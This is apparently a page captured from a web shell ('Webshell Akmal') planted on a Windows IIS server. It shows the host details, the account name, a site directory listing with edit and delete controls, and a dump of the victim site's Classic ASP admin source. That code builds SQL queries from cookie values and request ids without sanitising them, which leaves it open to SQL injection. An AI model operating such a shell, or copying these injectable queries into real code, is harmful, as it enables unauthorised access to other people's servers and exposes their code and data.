Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<% '-----检查用户名密码 Function Checkin(s) s=Trim(s) s=replace(s," ","&nbsp;") s=replace(s,"'","&#39;") s=replace(s,"""","&quot;") s=replace(s,"<","&lt;") s=replace(s,">","&gt;") Checkin=s end Function '检测输入的是否是数字,如果不是返回0 Function chk_num(mynum) on error resume next err.Clear mynum=clng(mynum) if err then chk_num=0 else chk_num=mynum end if err.Clear end Function '获取文件列表 Function getFileList(Byval cDir) dim filePath,objFolder,objFile,objFiles,i i=0 redim fileList(0) filePath=server.mapPath(cDir) Set objFSO = CreateObject("Scripting.FileSystemObject") set objFolder=objFso.GetFolder(filePath) set objFiles=objFolder.Files for each objFile in objFiles ReDim Preserve fileList(i) With objFile fileList(i)=.name&","&Mid(.name, InStrRev(.name, ".") + 1)&","&.size/1000&"KB,"&.DateLastModified&","&cDir&"/"&.name End With i=i + 1 next set objFiles=nothing set objFolder=nothing getFileList=fileList End Function '判断目录是否存在 Function GetIsFolder(str) dim fso Set fso = CreateObject("Scripting.FileSystemObject") If fso.FolderExists(Server.MapPath(str)) then GetIsFolder = True Else GetIsFolder = False End if Set fso = nothing End Function '创建目录 Function GetCreateFolder(str) dim fso,f Set fso = Server.CreateObject("Scripting.FileSystemObject") Set f = fso.CreateFolder(Server.MapPath(str)) GetCreateFolder = True Set fso = nothing End Function '字符转换函数,输入的 > < " ' 符号转换成html代码,换行再转换成<br /> Public Function HTMLEncode(str) If Not IsNull(str) Then str = Replace(str, Chr(38), "&") str = replace(str, "<", "<") str = replace(str, ">", ">") str = Replace(str, Chr(32), " ") str = Replace(str, Chr(34), """) str = Replace(str, Chr(39), "'") str = Replace(str, Chr(9), " ") str = Replace(str, Chr(13) & Chr(10), "<br />") str = Replace(str, Chr(10), "<br />") str = Replace(str, Chr(13), "<br />") HTMLEncode = str End If End Function '字符转回函数,先将<br />转成换行,然后再转 > < " ' Public Function HTMLDncode(str) If Not IsNull(str) Then str = Replace(str, "<br />", Chr(10)) str = Replace(str, "'", Chr(39)) str = Replace(str, """, Chr(34)) str = Replace(str, " ", Chr(9)) str = Replace(str, "<", "<") str = Replace(str, ">",">" ) str = Replace(str, " ", Chr(32)) str = Replace(str, "&", Chr(38)) str = Replace(str, "&", Chr(38)) HTMLDncode = str End If End Function '第三方代码字符转换函数 Public Function PluginsEncode(str) If Not IsNull(str) Then str = Replace(str, """", """""") str = Replace(str, Chr(13), "") str = Replace(str, Chr(10), "<br />") str = Replace(str, "&", "&") PluginsEncode = str End If End Function '第三方代码字符转回函数 Public Function PluginsDncode(str) If Not IsNull(str) Then str = Replace(str, """""", """") str = Replace(str, "<br />", Chr(10)) PluginsDncode = str End If End Function '从指定的字符串中第一个字符起的指定长度的字符串 Function Sort_cutTitle(ByVal strtitle,ByVal counts) Dim RegExpObj,ReGCheck Set RegExpObj=new RegExp RegExpObj.Pattern="^[\u4e00-\u9fa5]+$" Dim l,t,c,i l=Len(strtitle) t=0 For i=1 to l c=Mid(strtitle,i,1) ReGCheck=RegExpObj.test(c) If ReGCheck Then t=t+2 Else t=t+1 End If If t>counts Then Sort_cutTitle=left(strtitle,i)&"..." Exit For Else Sort_cutTitle=strtitle End If Next Set RegExpObj=nothing 'Sort_cutTitle=Replace(Sort_cutTitle,Chr(32)," ") Sort_cutTitle=Replace(Sort_cutTitle,Chr(10),"<br />") end Function 'html代码过滤js\css\html标签只剩BR Public Function filterhtml(Textstr) if isnull(Textstr) or Trim(Textstr)="" then filterhtml="" exit function end if Dim sStr, regEx sStr = Textstr sStr = replace(sStr, "<br />", "[br]") sStr = replace(sStr, "<br>", "[br]") sStr = replace(sStr, "</p>", "[br]") Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Multiline = True regEx.Pattern = "<script[\s\S]*?</script>" sStr = regEx.Replace(sStr, "") regEx.Pattern = "<style[\s\S]*?</style>" sStr = regEx.Replace(sStr, "") regEx.Pattern = "\s[on].+?=([\""|\'])(.*?)\1" sStr = regEx.Replace(sStr, "") regEx.Pattern = "<(.[^>]*)>" sStr = regEx.Replace(sStr, "") Set regEx = Nothing sStr = replace(sStr, " ", Chr(32)) sStr = replace(sStr, "[br]", Chr(10)) filterhtml = sStr End Function 'html代码过滤js\css\html Public Function filterhtmlAll(Textstr) if isnull(Textstr) or Trim(Textstr)="" then filterhtmlAll="" exit function end if Dim sStr, regEx sStr = Textstr Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Multiline = True regEx.Pattern = "<script[\s\S]*?</script>" sStr = regEx.Replace(sStr, "") regEx.Pattern = "<style[\s\S]*?</style>" sStr = regEx.Replace(sStr, "") regEx.Pattern = "\s[on].+?=([\""|\'])(.*?)\1" sStr = regEx.Replace(sStr, "") regEx.Pattern = "<(.[^>]*)>" sStr = regEx.Replace(sStr, "") Set regEx = Nothing sStr = replace(sStr, " ", Chr(32)) filterhtmlAll = sStr End Function '递归显示全部分类 sub ClassListInput(pid,lvl) Dim rs,i set rs=server.CreateObject ("adodb.recordset") sql="select id,Menu_Name,Menu_Parent from Site_Menu where Menu_Parent="&pid&" and Menu_lang=1 order by Menu_Parent,Hand_ID,id" rs.open sql,conn,1,1 k=1 do while not rs.eof if lvl=0 then if k=rs.recordcount then Response.Write("└"&rs("Menu_Name")) else Response.Write("├"&rs("Menu_Name")) end if else for i=1 to lvl response.write("│ ") next if k=rs.recordcount then Response.Write("└"&rs("Menu_Name")) else Response.Write("├"&rs("Menu_Name")) end if end if Response.Write "</br >" call ClassListInput(rs("id"),lvl+1) k=k+1 rs.movenext loop rs.close set rs=nothing end sub '递归显示全部分类 sub SelClass(pid,lvl,cid) Dim rs,i 'if pid=0 then 'Response.Write("<select name=""pcls"" id=""pcls"">") 'Response.Write("<option value=""0"">--选择类别--</option>") 'end if set rs=server.CreateObject ("adodb.recordset") sql="select id,Menu_Name,Menu_Parent,Menu_ChiID from Site_Menu where Menu_Parent="&pid&" order by Menu_Parent,Hand_ID,id" rs.open sql,conn,1,1 k=1 do while not rs.eof Response.Write "<option value="""&rs(0)&"""" if Trim(cstr(cid))=cstr(rs(0)) then Response.Write(" selected=""selected""") end if Response.Write ">" if lvl=0 then if k=rs.recordcount then Response.Write("└ "&rs(1)) else Response.Write("├ "&rs(1)) end if else for i=1 to lvl Response.Write("│ ") next if k=rs.recordcount then Response.Write("└ "&rs(1)) else Response.Write("├ "&rs(1)) end if 'if rs("Menu_ChiID")>0 then ' Response.Write("z;") 'end if end if Response.Write "</option>" call SelClass(rs("id"),lvl+1,cid) k=k+1 rs.movenext loop rs.close set rs=nothing 'if pid=0 then 'Response.Write("</select>") 'end if end sub Function SearClass(pid,lvl,cid) Dim rsSearClass,sqlSearClass,k,i set rsSearClass=server.CreateObject ("adodb.recordset") sqlSearClass="select id,Menu_Name,Menu_Type,Menu_Parent from Site_Menu where Menu_Parent="&pid&" order by Menu_Parent,Hand_ID,id" rsSearClass.open sqlSearClass,conn,1,1 k=1 do while not rsSearClass.eof Response.Write "<option value=""?menuid="&rsSearClass(0)&"""" if Trim(cstr(cid))=cstr(rsSearClass(0)) then Response.Write(" selected=""selected""") end if Response.Write ">" if lvl=0 then if k=rsSearClass.recordcount then Response.Write("└ "&rsSearClass("Menu_Name")) else Response.Write("├ "&rsSearClass("Menu_Name")) end if else for i=1 to lvl Response.Write("│ ") next if k=rsSearClass.recordcount then Response.Write("└ "&rsSearClass("Menu_Name")) else Response.Write("├ "&rsSearClass("Menu_Name")) end if end if Response.Write "</option>" SearClass rsSearClass("id"),lvl+1,cid k=k+1 rsSearClass.movenext loop rsSearClass.close set rsSearClass=nothing end Function '获取信息所在数据表 Function ChkMDB(pid) set rsChkMDB=server.CreateObject("adodb.recordset") sqlChkMDB="Select Menu_MDB,Menu_TopParent,Menu_Parent from Site_Menu where id="&pid&"" rsChkMDB.open sqlChkMDB,conn,1,1 if rsChkMDB.eof and rsChkMDB.bof then Response.Write("没有此菜单的数据库") Response.End else if rsChkMDB("Menu_Parent")=0 then ChkMDB=rsChkMDB("Menu_MDB") else set rs2ChkMDB=server.CreateObject("adodb.recordset") sql2ChkMDB="Select Menu_MDB from Site_Menu where id="&rsChkMDB("Menu_TopParent")&"" rs2ChkMDB.open sql2ChkMDB,conn,1,1 ChkMDB=rs2ChkMDB("Menu_MDB") rs2ChkMDB.Close set rs2ChkMDB=nothing end if rsChkMDB.close set rsChkMDB=nothing end If end Function '菜单名单独调用 Function MenuName(pid,lvl) set rsMenuName=server.CreateObject("adodb.recordset") sqlMenuName="Select id,Menu_Name,Menu_Type,Menu_Target,Menu_Link,Menu_Link_List from Site_Menu where id="&pid&"" rsMenuName.open sqlMenuName,conn,1,1 if rsMenuName.eof and rsMenuName.bof then Response.Write("暂无信息") else if lvl=0 then Response.Write(""&rsMenuName("Menu_Name")&"") end if rsMenuName.close set rsMenuName=nothing end If end Function '统计栏目信息个数 Function list_infoCount(pid) set rs=server.CreateObject ("adodb.recordset") sql="select Menu_ChiID from Site_Menu where id="&pid&"" rs.open sql,conn,1,1 if rs.eof and rs.bof then Response.Write("暂无信息") else if rs("Menu_ChiID")=0 then rsID=pid else rsID="" set rs2=server.CreateObject ("adodb.recordset") sql2="select id from Site_Menu where id="&pid&" or Menu_Parent="&pid&" or Menu_ParentPath like '0,"&pid&",%'" rs2.open sql2,conn,1,1 if rs2.eof and rs2.bof then Response.Write("暂无信息") else do while not rs2.eof if rsID="" then rsID=rs2(0) else rsID=rsID & "," & rs2(0) end if rs2.movenext loop end if rs2.close set rs2=nothing end if end if rs.close set rs=nothing set rs=server.CreateObject("adodb.recordset") rs.open "select count(*) as c from "&ChkMDB(pid)&" where Menu_ID in ("&rsID&")",conn,1,1 Response.Write rs("c") rs.close set rs=nothing end Function '后台主页信息调用 Function index_list(listid,listnum,textnum,liststyle) if listnum=0 then listnum="" else listnum=" top "&listnum&"" end if set rs=server.CreateObject ("adodb.recordset") sql="select Menu_ChiID from Site_Menu where id="&listid&"" rs.open sql,conn,1,1 if rs.eof and rs.bof then Response.Write("暂无信息") else if rs("Menu_ChiID")=0 then rsID=listid else rsID="" set rs2=server.CreateObject ("adodb.recordset") sql2="select id from Site_Menu where id="&listid&" or Menu_Parent="&listid&" or Menu_ParentPath like '0,"&listid&",%'" rs2.open sql2,conn,1,1 if rs2.eof and rs2.bof then Response.Write("暂无信息") else do while not rs2.eof if rsID="" then rsID=rs2(0) else rsID=rsID & "," & rs2(0) end if rs2.movenext loop end if rs2.close set rs2=nothing end if end if rs.close set rs=nothing if liststyle=1 then'调用留言 set rs=server.CreateObject ("adodb.recordset") sql="select"&listnum&" id,Read,Time_Add,Guest_Name from Site_Guestbook order by id desc" rs.open sql,conn,1,1 if rs.eof and rs.bof then Response.Write("<li><center>暂无留言</center></li>") else do while not rs.eof Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""GuestBook_view.asp?id="&rs("id")&"""><img src=""images/info_view.gif"" alt=""查看"&rs("Guest_Name")&""" /></a></span>") Response.Write("<span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span><span") if rs("Read")=0 then Response.Write(" style=""font-weight:bold""") end if Response.Write(">"&Sort_cutTitle(rs("Guest_Name"),textnum)&"</span></li>") rs.movenext loop end if elseif liststyle=2 then'调用产品 set rs=server.CreateObject ("adodb.recordset") sql="select"&listnum&" id,Time_Add,Title from "&ChkMDB(listid)&" where Menu_ID in ("&rsID&") order by Hand_ID desc,id desc" rs.open sql,conn,1,1 if rs.eof and rs.bof then Response.Write("<li><center>暂无信息</center></li>") else do while not rs.eof Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""Products_edit.asp?id="&rs("id")&"&menuid="&listid&"""><img src=""images/info_edit.gif"" alt=""编辑"&rs("Title")&""" /></a> <a title=""确认删除"" href=""Products_del.asp?height=105&width=380&id="&rs("id")&"&menuid="&listid&""" class=""thickbox""><img src=""images/info_del.gif"" alt=""删除"&rs("Title")&""" /></a></span><span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span>"&Sort_cutTitle(rs("Title"),textnum)&"</li>") rs.movenext loop end if elseif liststyle=3 then'调用新闻 set rs=server.CreateObject ("adodb.recordset") sql="select"&listnum&" id,Time_Add,Title from "&ChkMDB(listid)&" where Menu_ID in ("&rsID&") order by Hand_ID desc,id desc" rs.open sql,conn,1,1 if rs.eof and rs.bof then Response.Write("<li><center>暂无信息</center></li>") else do while not rs.eof Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""News_edit.asp?id="&rs("id")&"&menuid="&listid&"""><img src=""images/info_edit.gif"" alt=""编辑"&rs("Title")&""" /></a> <a title=""确认删除"" href=""News_del.asp?height=105&width=380&id="&rs("id")&"&menuid="&listid&""" class=""thickbox""><img src=""images/info_del.gif"" alt=""删除"&rs("Title")&""" /></a></span><span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span>"&Sort_cutTitle(rs("Title"),textnum)&"</li>") rs.movenext loop end if end if rs.close set rs=nothing end Function '-----检查初级管理员 Function CheckAdmin1 if Request.Cookies("WebCookieUser")<>"" And Request.Cookies("WebCookiePass")<>"" then set rs=server.createobject("adodb.recordset") sql="select * from SiteControl_Admin where SiteControl_LoginName='"&Request.Cookies("WebCookieUser")&"' and SiteControl_LoginPass='"&Request.Cookies("WebCookiePass")&"'" rs.open sql,conn,1,1 if not rs.eof then Response.Cookies("WebCookieUser")=rs("SiteControl_LoginName") Response.Cookies("WebCookiePass")=rs("SiteControl_LoginPass") Response.Cookies("WebCookieRealName")=rs("SiteControl_RealName") Response.Cookies("WebCookieLevel")=rs("SiteControl_AdminLevel") else response.redirect "control_login.asp" end if rs.close set rs=nothing else response.redirect "control_login.asp" end if end Function '-----检查中级管理员 Function CheckAdmin2 if Response.Cookies("WebManageSession")<>true then response.redirect "control_login.asp" if Response.Cookies("WebManageSession")<>true or (Response.Cookies("WebManageKey")<>"check" and Response.Cookies("WebManageKey")<>"0") then response.redirect "control_main.asp?err=你的权限的不够!!" end Function '-----检查高级级管理员 Function CheckAdmin3 if Response.Cookies("WebManageSession")<>true then response.redirect "control_login.asp" if Response.Cookies("WebManageSession")<>true or Response.Cookies("WebManageKey")<>"0" then response.redirect "control_main.asp?err=你的权限的不够!!" end Function %> <% '-----错误输出 sub error() %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body,html,p{margin:0px;padding:0px} /* Clear */ .clearfix:after{content:"";display:block;height:0px;clear:both;visibility:hidden} .clearfix{display:inline-block} /* Hides from IE-mac \*/ * html .clearfix{height:1%} .clearfix{display:block} /* End hide from IE-mac */ body{background:#e9e9e9 url(/images/404_bg.gif) center repeat-y;padding:10px;color:#3e3e3e;font:14px/1.5 "\5FAE\8F6F\96C5\9ED1","\5B8B\4F53",Tahoma,Helvetica,Arial,sans-serif} #wrapper{border:3px solid #ededed;background:#FFF;margin:0px auto;width:720px} #top{background:url(/images/nav_bg.gif);height:70px} #logo{float:left;text-align:center;padding-top:8px;width:210px} #menu{float:right;font-size:12px;padding:32px 20px 0px 0px} #menu a:link,#menu a:visited,#menu a:active{color:#FFF;text-decoration:none} #menu a:hover{font-weight:bold} #contact{padding:15px 15px 0px 15px} #contact p{margin-bottom:15px;text-align:center} #contact span{color:#186bbf} .fun{color:#666;font-size:12px;padding:0px 20px} .fun a:link,.fun a:visited,.fun a:active{border:1px dashed #FFF;border-bottom:1px dashed #186bbf;color:#186bbf;text-decoration:none} .fun a:hover{border:1px dashed #186bbf} #none404{border:#CCC 1px dashed;text-align:center} #copyright{font-size:12px;text-align:center;padding-bottom:10px} #copyright a:link,#copyright a:visited,#copyright a:active{border:1px dashed #FFF;border-bottom:1px dashed #186bbf;color:#186bbf;text-decoration:none} #copyright a:hover{border:1px dashed #186bbf} </style> <script language="javascript" type="text/javascript"> var i = 5; var intervalid; intervalid = setInterval("fun()", 1000); function fun() { if (i == 0) { //window.location.href = "/Default.aspx"; window.history.back(-1); clearInterval(intervalid); } document.getElementById("mes").innerHTML = i; i--; } </script> <title></title> </head> <body> <div id="wrapper"> <div id="top" class="clearfix"> <div id="logo"><a href="http://www.netgather.com"><img src="/images/netgather_com.gif" alt="网聚网" width="144" height="55" border="0" /></a></div> </div> <div id="contact"> <p><b><font color="#FF0000">Error!</font> <%=errmsg%>!</b><br /> <b><a href="javascript:history.go(-1)">返回 BACK</a></b><br /> <span id="mes" style="color:#F00">5</span>秒后将自动返回</p> </div> <div id="copyright">Copyright <a href="http://www.netgather.com">NetGather网聚网</a> 版权所有</div> </div> </body> </html> <% End sub %>